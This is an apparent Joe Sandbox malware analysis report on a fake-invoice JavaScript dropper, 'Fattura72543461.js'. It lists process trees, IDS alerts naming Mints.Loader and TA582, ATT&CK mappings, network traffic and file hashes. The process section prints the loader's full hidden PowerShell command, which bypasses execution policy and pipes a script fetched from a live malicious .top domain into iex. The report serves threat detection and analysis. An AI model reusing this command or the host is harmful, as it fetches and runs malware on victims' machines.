Windows
Analysis Report
Fattura72543461.js
Overview
General Information
Detection
Score: | 92 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7468 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Fattu ra72543461 .js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7836 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -executio npolicy by pass -Wind owStyle hi dden -c "c url -useb 'http://mb uzy3yvzw3r .top/1.php ?s=mints13 ' | iex" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7844 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
System Summary |
---|
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: frack113: |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-17T11:31:37.466142+0100 | 2057063 | 1 | A Network Trojan was detected | 192.168.2.8 | 49708 | 45.61.137.71 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-17T11:31:37.466142+0100 | 2057743 | 1 | A Network Trojan was detected | 192.168.2.8 | 49708 | 45.61.137.71 | 80 | TCP |
Click to jump to signature section
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition | ||
Source: | Return value : | Go to definition | ||
Source: | Return value : | Go to definition |
Source: | Child: |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic: |
Source: | IP Address: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 3_2_00007FFB4A1720B8 |
Source: | Initial sample: |
Source: | Classification label: |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 3_2_00007FFB4A1700C1 |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File deleted: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Process created: |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Exploitation for Client Execution | 32 Scripting | 11 Process Injection | 21 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 3 PowerShell | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 File Deletion | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | ReversingLabs | Text.Malware.Boxter |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
www.google.com | 142.250.201.4 | true | false | high | |
mbuzy3yvzw3r.top | 45.61.137.71 | true | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high | ||
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
45.61.137.71 | mbuzy3yvzw3r.top | United States | 40676 | AS40676US | false | |
142.250.201.4 | www.google.com | United States | 15169 | GOOGLEUS | false |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1576661 |
Start date and time: | 2024-12-17 11:30:10 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 3m 38s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Fattura72543461.js |
Detection: | MAL |
Classification: | mal92.expl.evad.winJS@4/5@2/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 4.245.163.56, 172.202.163.200
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 7836 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: Fattura72543461.js
Time | Type | Description |
---|---|---|
05:31:33 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
45.61.137.71 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
mbuzy3yvzw3r.top | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
AS40676US | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul3nqth:NllUa |
MD5: | 851531B4FD612B0BC7891B3F401A478F |
SHA1: | 483F0D1E71FB0F6EFF159AA96CC82422CF605FB3 |
SHA-256: | 383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F |
SHA-512: | A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6222 |
Entropy (8bit): | 3.7138891553585003 |
Encrypted: | false |
SSDEEP: | 96:TGZClP8h2kvhkvCCtYhvlPsHYavlPNHYy:TGYPAiYhvravgy |
MD5: | 17D5E8AD2FCC474E808FFDC5EB603737 |
SHA1: | 241EE27100F74E4A194EE0F421B5CDF0FE5FFB78 |
SHA-256: | 6872270B6672F919AA1C8D340C871AA5D902EFC755863B5FD721D7E717A288A5 |
SHA-512: | 5C5EB4FBB48BFFC0FC2509E9CA512F781299B9459321EDBA954FF1736EC75FC992A2B918B72FD5A41F1528F675236162765E4FBB2F0ADA2379C60884EAA533C3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YEOKDD6CLOMFADJQC4D3.temp
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6222 |
Entropy (8bit): | 3.7138891553585003 |
Encrypted: | false |
SSDEEP: | 96:TGZClP8h2kvhkvCCtYhvlPsHYavlPNHYy:TGYPAiYhvravgy |
MD5: | 17D5E8AD2FCC474E808FFDC5EB603737 |
SHA1: | 241EE27100F74E4A194EE0F421B5CDF0FE5FFB78 |
SHA-256: | 6872270B6672F919AA1C8D340C871AA5D902EFC755863B5FD721D7E717A288A5 |
SHA-512: | 5C5EB4FBB48BFFC0FC2509E9CA512F781299B9459321EDBA954FF1736EC75FC992A2B918B72FD5A41F1528F675236162765E4FBB2F0ADA2379C60884EAA533C3 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.517925653495695 |
TrID: | |
File name: | Fattura72543461.js |
File size: | 100'284 bytes |
MD5: | 40ef9511d762c47c5876246943671176 |
SHA1: | e1bc94a2f751ddc15f9aeb28c88ecb9b79ed36cd |
SHA256: | 0c5c602416e2297e797efae478763caeef6f0e5f49fc21e6877f765d852680a9 |
SHA512: | 4fcc20703ce00cf38efc734c6cdc9d053c8a52359c484836f22a586293e2da3960888651d268257a8e61827773b292bf9c94adc456c8b67e95384da0242874f8 |
SSDEEP: | 768:X4mI4mC4m1Y2Y25uY4YdYrq3t4moYI5uZ24mC4mO2Bvvvl4mg2Bv4mOvvf2BvvvM:u |
TLSH: | DFA38575DF76137A4B03094E79938197C98D66191220270BB6AC533CB37389C16FAEEB |
File Content Preview: | WScript.Sleep(25000);..// portrayers timing gust hamza scamsters gomeral mediatizes annoy thermidor sabotaged kilolitres orismology pitchpoled magdalene acrider screed frore vermiculite finds feminine shebeans aediles chronologically butterburs vitrioling |
Icon Hash: | 68d69b8bb6aa9a86 |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-17T11:31:37.466142+0100 | 2057063 | ET MALWARE Mints.Loader CnC Activity (GET) | 1 | 192.168.2.8 | 49708 | 45.61.137.71 | 80 | TCP |
2024-12-17T11:31:37.466142+0100 | 2057743 | ET MALWARE TA582 CnC Checkin | 1 | 192.168.2.8 | 49708 | 45.61.137.71 | 80 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 17, 2024 11:31:35.701267958 CET | 49708 | 80 | 192.168.2.8 | 45.61.137.71 |
Dec 17, 2024 11:31:35.821324110 CET | 80 | 49708 | 45.61.137.71 | 192.168.2.8 |
Dec 17, 2024 11:31:35.821404934 CET | 49708 | 80 | 192.168.2.8 | 45.61.137.71 |
Dec 17, 2024 11:31:35.824373007 CET | 49708 | 80 | 192.168.2.8 | 45.61.137.71 |
Dec 17, 2024 11:31:35.944446087 CET | 80 | 49708 | 45.61.137.71 | 192.168.2.8 |
Dec 17, 2024 11:31:37.415682077 CET | 80 | 49708 | 45.61.137.71 | 192.168.2.8 |
Dec 17, 2024 11:31:37.466141939 CET | 49708 | 80 | 192.168.2.8 | 45.61.137.71 |
Dec 17, 2024 11:31:37.558659077 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:37.678625107 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:37.678772926 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:37.678965092 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:37.799664974 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.091379881 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.091440916 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.091478109 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.091511011 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.091543913 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.091593981 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.091628075 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.091628075 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.091628075 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.091666937 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.091675043 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.091711998 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.091811895 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.091849089 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.091892958 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.211682081 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.211734056 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.211833954 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
